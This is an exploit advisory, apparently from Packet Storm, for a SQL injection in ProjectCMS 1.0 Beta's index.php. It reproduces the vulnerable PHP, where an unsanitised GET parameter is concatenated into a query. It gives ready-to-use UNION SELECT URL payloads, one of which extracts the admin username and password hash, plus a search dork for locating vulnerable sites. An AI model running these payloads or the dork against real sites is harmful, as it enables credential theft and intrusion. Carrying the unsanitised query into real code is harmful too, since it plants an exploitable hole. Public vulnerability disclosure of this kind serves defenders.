ProjectCMS version 1.0b suffers from a remote SQL injection vulnerability in index.php.
3f048e603eb91f2e2fdf9c06c7b467f1***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **
** ¡PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| SQL INJECTION (SQLi) VULNERABILITY |
|--------------------------------------------------------------------------------------------|
| | ProjectCMS v1.0 Beta Final | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://projectcms.org/ |
|-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip |
|-->DEMO: http://projectcms.org |
|-->CATEGORY: CMS / Portal |
|-->DESCRIPTION: ProjectCMS is an open source community project to create |
| a simple content management system with an easy to follow install... |
|-->RELEASED: 2009-04-29 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: "Powered by ProjectCMS" |
|-->CATEGORY: SQL INJECTION VULNERABILITY |
|-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?) |
|-->Discovered Bug date: 2009-04-29 |
|-->Reported Bug date: 2009-04-29 |
|-->Fixed bug date: N/A |
|-->Info patch: N/A |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
----------------------------------------------------------------------------------------------
#########################
////////////////////////
SQL INJECTION (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>
-----------
VULN FILE:
-----------
...
$sn=$_GET["sn"];
if ( $sn == "" ) {
$sn = "1";
}
$sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'";
$result=mysql_query($sql,$connection) or die(mysql_error());
...
------------------
PROOF OF CONCEPT:
------------------
http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*
Return --> user and database, this last in title ;)
----------
EXPLOIT:
----------
http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*
Return --> username:::password (md5 hash) of admin and database (in title too).
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS and all SPANISH Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!